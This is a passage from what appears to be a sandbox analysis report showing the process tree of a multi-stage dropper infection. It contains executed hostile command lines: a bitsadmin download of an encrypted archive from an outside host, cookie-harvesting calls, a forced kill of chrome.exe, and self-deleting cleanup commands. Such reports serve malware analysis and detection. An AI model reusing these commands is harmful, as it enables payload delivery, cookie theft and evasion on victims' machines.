                                                                  • C:\Users\Admin\AppData\Local\9da19bbe-73dd-4536-9889-554993612cac\AAA8.exe
                                                                    C:\Users\Admin\AppData\Local\9da19bbe-73dd-4536-9889-554993612cac\AAA8.exe --Task
                                                                    2⤵
                                                                    • Suspicious use of SetThreadContext
                                                                    PID:3624
                                                                    • C:\Users\Admin\AppData\Local\9da19bbe-73dd-4536-9889-554993612cac\AAA8.exe
                                                                      C:\Users\Admin\AppData\Local\9da19bbe-73dd-4536-9889-554993612cac\AAA8.exe --Task
                                                                      3⤵
                                                                        PID:2332
                                                                    • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                      C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                      2⤵
                                                                      • Suspicious use of SetThreadContext
                                                                      PID:64
                                                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                        C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                        3⤵
                                                                          PID:3148
                                                                      • C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                                                                        C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                                                                        2⤵
                                                                        • Checks BIOS information in registry
                                                                        • Checks whether UAC is enabled
                                                                        • Drops file in System32 directory
                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                        PID:1204
                                                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                        C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                        2⤵
                                                                        • Suspicious use of SetThreadContext
                                                                        PID:1676
                                                                        • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                          C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                          3⤵
                                                                            PID:1764
                                                                        • C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                                                                          C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                                                                          2⤵
                                                                          • Checks BIOS information in registry
                                                                          • Checks whether UAC is enabled
                                                                          • Drops file in System32 directory
                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                          PID:2900
                                                                        • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                          C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                          2⤵
                                                                          • Suspicious use of SetThreadContext
                                                                          PID:2188
                                                                          • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                            C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                            3⤵
                                                                              PID:2716
                                                                          • C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                                                                            C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                                                                            2⤵
                                                                            • Checks BIOS information in registry
                                                                            • Checks whether UAC is enabled
                                                                            • Drops file in System32 directory
                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                            PID:6120
                                                                          • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                            C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                            2⤵
                                                                            • Suspicious use of SetThreadContext
                                                                            PID:5396
                                                                            • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                              C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                              3⤵
                                                                                PID:6236
                                                                            • C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                                                                              C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                                                                              2⤵
                                                                              • Checks BIOS information in registry
                                                                              • Checks whether UAC is enabled
                                                                              • Drops file in System32 directory
                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                              PID:6844
                                                                            • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                              C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                              2⤵
                                                                              • Suspicious use of SetThreadContext
                                                                              PID:5564
                                                                              • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                3⤵
                                                                                  PID:6800
                                                                              • C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                                                                                C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                                                                                2⤵
                                                                                • Checks BIOS information in registry
                                                                                • Checks whether UAC is enabled
                                                                                • Drops file in System32 directory
                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                PID:5488
                                                                              • C:\Users\Admin\AppData\Local\9da19bbe-73dd-4536-9889-554993612cac\AAA8.exe
                                                                                C:\Users\Admin\AppData\Local\9da19bbe-73dd-4536-9889-554993612cac\AAA8.exe --Task
                                                                                2⤵
                                                                                • Suspicious use of SetThreadContext
                                                                                PID:3192
                                                                                • C:\Users\Admin\AppData\Local\9da19bbe-73dd-4536-9889-554993612cac\AAA8.exe
                                                                                  C:\Users\Admin\AppData\Local\9da19bbe-73dd-4536-9889-554993612cac\AAA8.exe --Task
                                                                                  3⤵
                                                                                    PID:2316
                                                                                • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                  C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                  2⤵
                                                                                  • Suspicious use of SetThreadContext
                                                                                  PID:3808
                                                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                    C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                    3⤵
                                                                                      PID:4812
                                                                                  • C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                                                                                    C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                                                                                    2⤵
                                                                                    • Checks BIOS information in registry
                                                                                    • Checks whether UAC is enabled
                                                                                    • Drops file in System32 directory
                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                    PID:6528
                                                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                    C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                    2⤵
                                                                                    • Suspicious use of SetThreadContext
                                                                                    PID:6912
                                                                                    • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                      C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                      3⤵
                                                                                        PID:4932
                                                                                    • C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                                                                                      C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                                                                                      2⤵
                                                                                      • Checks BIOS information in registry
                                                                                      • Checks whether UAC is enabled
                                                                                      • Drops file in System32 directory
                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                      PID:6552
                                                                                    • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                      C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                      2⤵
                                                                                      • Suspicious use of SetThreadContext
                                                                                      PID:6092
                                                                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                        C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                        3⤵
                                                                                          PID:6600
                                                                                      • C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                                                                                        C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                                                                                        2⤵
                                                                                        • Checks BIOS information in registry
                                                                                        • Checks whether UAC is enabled
                                                                                        • Drops file in System32 directory
                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                        PID:4956
                                                                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                        C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                        2⤵
                                                                                        • Suspicious use of SetThreadContext
                                                                                        PID:3324
                                                                                        • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                          C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                          3⤵
                                                                                            PID:6056
                                                                                        • C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                                                                                          C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                                                                                          2⤵
                                                                                          • Checks BIOS information in registry
                                                                                          • Checks whether UAC is enabled
                                                                                          • Drops file in System32 directory
                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                          PID:6168
                                                                                        • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                          C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                          2⤵
                                                                                          • Suspicious use of SetThreadContext
                                                                                          PID:5608
                                                                                          • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                            C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                            3⤵
                                                                                              PID:6116
                                                                                          • C:\Users\Admin\AppData\Roaming\eafvsiu
                                                                                            C:\Users\Admin\AppData\Roaming\eafvsiu
                                                                                            2⤵
                                                                                            • Checks SCSI registry key(s)
                                                                                            • Suspicious behavior: MapViewOfSection
                                                                                            PID:1808
                                                                                        • c:\windows\system32\svchost.exe
                                                                                          c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                                                                                          1⤵
                                                                                            PID:1008
                                                                                          • C:\Users\Admin\AppData\Local\Temp\8 (18).exe
                                                                                            "C:\Users\Admin\AppData\Local\Temp\8 (18).exe"
                                                                                            1⤵
                                                                                            • Suspicious use of WriteProcessMemory
                                                                                            PID:1716
                                                                                            • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
                                                                                              "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
                                                                                              2⤵
                                                                                              • Executes dropped EXE
                                                                                              • Suspicious use of WriteProcessMemory
                                                                                              PID:2660
                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS46A22304\setup_install.exe
                                                                                                "C:\Users\Admin\AppData\Local\Temp\7zS46A22304\setup_install.exe"
                                                                                                3⤵
                                                                                                • Executes dropped EXE
                                                                                                • Loads dropped DLL
                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                PID:2156
                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                  C:\Windows\system32\cmd.exe /c sonia_1.exe
                                                                                                  4⤵
                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                  PID:3224
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS46A22304\sonia_1.exe
                                                                                                    sonia_1.exe
                                                                                                    5⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                    PID:3500
                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                  C:\Windows\system32\cmd.exe /c sonia_4.exe
                                                                                                  4⤵
                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                  PID:3084
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS46A22304\sonia_4.exe
                                                                                                    sonia_4.exe
                                                                                                    5⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    PID:2096
                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                  C:\Windows\system32\cmd.exe /c sonia_3.exe
                                                                                                  4⤵
                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                  PID:3708
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS46A22304\sonia_3.exe
                                                                                                    sonia_3.exe
                                                                                                    5⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • Modifies system certificate store
                                                                                                    PID:696
                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 696 -s 952
                                                                                                      6⤵
                                                                                                      • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                      • Program crash
                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:4844
                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                  C:\Windows\system32\cmd.exe /c sonia_5.exe
                                                                                                  4⤵
                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                  PID:3108
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS46A22304\sonia_5.exe
                                                                                                    sonia_5.exe
                                                                                                    5⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • Checks computer location settings
                                                                                                    PID:648
                                                                                                    • C:\Users\Admin\Documents\22XlL5sNPH3mFhkcWUHyd0t2.exe
                                                                                                      "C:\Users\Admin\Documents\22XlL5sNPH3mFhkcWUHyd0t2.exe"
                                                                                                      6⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:5104
                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                        cmd.exe /c taskkill /f /im chrome.exe
                                                                                                        7⤵
                                                                                                          PID:5260
                                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                                            taskkill /f /im chrome.exe
                                                                                                            8⤵
                                                                                                            • Executes dropped EXE
                                                                                                            • Suspicious use of SetThreadContext
                                                                                                            • Kills process with taskkill
                                                                                                            PID:2760
                                                                                                      • C:\Users\Admin\Documents\WXvjfXPF1wZWbnweaHugCYFP.exe
                                                                                                        "C:\Users\Admin\Documents\WXvjfXPF1wZWbnweaHugCYFP.exe"
                                                                                                        6⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • Loads dropped DLL
                                                                                                        • Drops file in Program Files directory
                                                                                                        PID:4328
                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsvF97B.tmp\tempfile.ps1"
                                                                                                          7⤵
                                                                                                            PID:1884
                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsvF97B.tmp\tempfile.ps1"
                                                                                                            7⤵
                                                                                                              PID:5364
                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsvF97B.tmp\tempfile.ps1"
                                                                                                              7⤵
                                                                                                                PID:6876
                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsvF97B.tmp\tempfile.ps1"
                                                                                                                7⤵
                                                                                                                  PID:6740
                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsvF97B.tmp\tempfile.ps1"
                                                                                                                  7⤵
                                                                                                                    PID:6400
                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsvF97B.tmp\tempfile.ps1"
                                                                                                                    7⤵
                                                                                                                      PID:6840
                                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsvF97B.tmp\tempfile.ps1"
                                                                                                                      7⤵
                                                                                                                      • Checks for any installed AV software in registry
                                                                                                                      PID:6468
                                                                                                                    • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                      "bitsadmin" /Transfer helper http://fsstoragecloudservice.com/data/data.7z C:\zip.7z
                                                                                                                      7⤵
                                                                                                                      • Download via BitsAdmin
                                                                                                                      PID:6360
                                                                                                                    • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                                                                      "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pQLV9quaGdLErsKh -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                                                                      7⤵
                                                                                                                      • Drops file in Program Files directory
                                                                                                                      PID:620
                                                                                                                    • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                                                                      "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pfsY50a76TFlsHmZ -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                                                                      7⤵
                                                                                                                        PID:2356
                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsvF97B.tmp\tempfile.ps1"
                                                                                                                        7⤵
                                                                                                                          PID:6896
                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsvF97B.tmp\tempfile.ps1"
                                                                                                                          7⤵
                                                                                                                            PID:7100
                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsvF97B.tmp\tempfile.ps1"
                                                                                                                            7⤵
                                                                                                                              PID:6560
                                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsvF97B.tmp\tempfile.ps1"
                                                                                                                              7⤵
                                                                                                                                PID:6328
                                                                                                                                • C:\Windows\System32\Conhost.exe
                                                                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                  8⤵
                                                                                                                                    PID:4764
                                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsvF97B.tmp\tempfile.ps1"
                                                                                                                                  7⤵
                                                                                                                                    PID:5440
                                                                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                      8⤵
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      PID:5916
                                                                                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                    C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\hdvAaRs\hdvAaRs.dll" hdvAaRs
                                                                                                                                    7⤵
                                                                                                                                      PID:864
                                                                                                                                      • C:\Windows\system32\rundll32.exe
                                                                                                                                        C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\hdvAaRs\hdvAaRs.dll" hdvAaRs
                                                                                                                                        8⤵
                                                                                                                                        • Drops file in System32 directory
                                                                                                                                        PID:4828
                                                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsvF97B.tmp\tempfile.ps1"
                                                                                                                                      7⤵
                                                                                                                                        PID:7020
                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsvF97B.tmp\tempfile.ps1"
                                                                                                                                        7⤵
                                                                                                                                        • Drops file in Program Files directory
                                                                                                                                        PID:6320
                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsvF97B.tmp\tempfile.ps1"
                                                                                                                                        7⤵
                                                                                                                                          PID:4928
                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsvF97B.tmp\tempfile.ps1"
                                                                                                                                          7⤵
                                                                                                                                            PID:5020
                                                                                                                                            • C:\Windows\System32\Conhost.exe
                                                                                                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                              8⤵
                                                                                                                                                PID:6860
                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsvF97B.tmp\tempfile.ps1"
                                                                                                                                              7⤵
                                                                                                                                                PID:6648
                                                                                                                                              • C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
                                                                                                                                                "C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
                                                                                                                                                7⤵
                                                                                                                                                • Drops file in Program Files directory
                                                                                                                                                PID:5156
                                                                                                                                            • C:\Users\Admin\Documents\45C54gyrHMnkEdy8ZvC608wj.exe
                                                                                                                                              "C:\Users\Admin\Documents\45C54gyrHMnkEdy8ZvC608wj.exe"
                                                                                                                                              6⤵
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              • Checks BIOS information in registry
                                                                                                                                              • Checks whether UAC is enabled
                                                                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                              PID:4280
                                                                                                                                            • C:\Users\Admin\Documents\eA04l6m191pSnmTVROTQlWEj.exe
                                                                                                                                              "C:\Users\Admin\Documents\eA04l6m191pSnmTVROTQlWEj.exe"
                                                                                                                                              6⤵
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              PID:3396
                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 3396 -s 660
                                                                                                                                                7⤵
                                                                                                                                                • Program crash
                                                                                                                                                PID:3420
                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 3396 -s 672
                                                                                                                                                7⤵
                                                                                                                                                • Program crash
                                                                                                                                                PID:4624
                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 3396 -s 648
                                                                                                                                                7⤵
                                                                                                                                                • Program crash
                                                                                                                                                PID:3920
                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 3396 -s 1072
                                                                                                                                                7⤵
                                                                                                                                                • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                • Program crash
                                                                                                                                                PID:5496
                                                                                                                                            • C:\Users\Admin\Documents\JwTN0NLECGd2zgx2Hj3ssila.exe
                                                                                                                                              "C:\Users\Admin\Documents\JwTN0NLECGd2zgx2Hj3ssila.exe"
                                                                                                                                              6⤵
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              • Loads dropped DLL
                                                                                                                                              • Checks SCSI registry key(s)
                                                                                                                                              • Suspicious behavior: MapViewOfSection
                                                                                                                                              PID:2692
                                                                                                                                            • C:\Users\Admin\Documents\0yUTtWQvOzAtcakpJyiEMShl.exe
                                                                                                                                              "C:\Users\Admin\Documents\0yUTtWQvOzAtcakpJyiEMShl.exe"
                                                                                                                                              6⤵
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              PID:4128
                                                                                                                                              • C:\Users\Admin\Documents\0yUTtWQvOzAtcakpJyiEMShl.exe
                                                                                                                                                "C:\Users\Admin\Documents\0yUTtWQvOzAtcakpJyiEMShl.exe"
                                                                                                                                                7⤵
                                                                                                                                                • Modifies data under HKEY_USERS
                                                                                                                                                • Modifies system certificate store
                                                                                                                                                PID:6808
                                                                                                                                            • C:\Users\Admin\Documents\n4o8ciqnEtBAvcS1TmcHowNe.exe
                                                                                                                                              "C:\Users\Admin\Documents\n4o8ciqnEtBAvcS1TmcHowNe.exe"
                                                                                                                                              6⤵
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                                              PID:688
                                                                                                                                              • C:\Users\Admin\Documents\n4o8ciqnEtBAvcS1TmcHowNe.exe
                                                                                                                                                "{path}"
                                                                                                                                                7⤵
                                                                                                                                                • Loads dropped DLL
                                                                                                                                                • Checks processor information in registry
                                                                                                                                                PID:5860
                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                  "C:\Windows\System32\cmd.exe" /c taskkill /im n4o8ciqnEtBAvcS1TmcHowNe.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\n4o8ciqnEtBAvcS1TmcHowNe.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                  8⤵
                                                                                                                                                    PID:4644
                                                                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                      taskkill /im n4o8ciqnEtBAvcS1TmcHowNe.exe /f
                                                                                                                                                      9⤵
                                                                                                                                                      • Kills process with taskkill
                                                                                                                                                      PID:6596
                                                                                                                                                    • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                      timeout /t 6
                                                                                                                                                      9⤵
                                                                                                                                                      • Delays execution with timeout.exe
                                                                                                                                                      PID:5320
                                                                                                                                              • C:\Users\Admin\Documents\Ig8GCkghEXwehG5c_aGx0eqi.exe
                                                                                                                                                "C:\Users\Admin\Documents\Ig8GCkghEXwehG5c_aGx0eqi.exe"
                                                                                                                                                6⤵
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                PID:2724
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                  7⤵
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  PID:5076
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                  7⤵
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  PID:5872
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                  7⤵
                                                                                                                                                    PID:6256
                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                    7⤵
                                                                                                                                                      PID:2044
                                                                                                                                                  • C:\Users\Admin\Documents\NJNJAFdplSwer8vJJO02gG44.exe
                                                                                                                                                    "C:\Users\Admin\Documents\NJNJAFdplSwer8vJJO02gG44.exe"
                                                                                                                                                    6⤵
                                                                                                                                                      PID:504
                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                        "C:\Windows\System32\cmd.exe" /c taskkill /im NJNJAFdplSwer8vJJO02gG44.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\NJNJAFdplSwer8vJJO02gG44.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                        7⤵
                                                                                                                                                          PID:4324
                                                                                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                            taskkill /im NJNJAFdplSwer8vJJO02gG44.exe /f
                                                                                                                                                            8⤵
                                                                                                                                                            • Kills process with taskkill
                                                                                                                                                            PID:5572
                                                                                                                                                          • C:\Windows\SysWOW64\timeout.exe
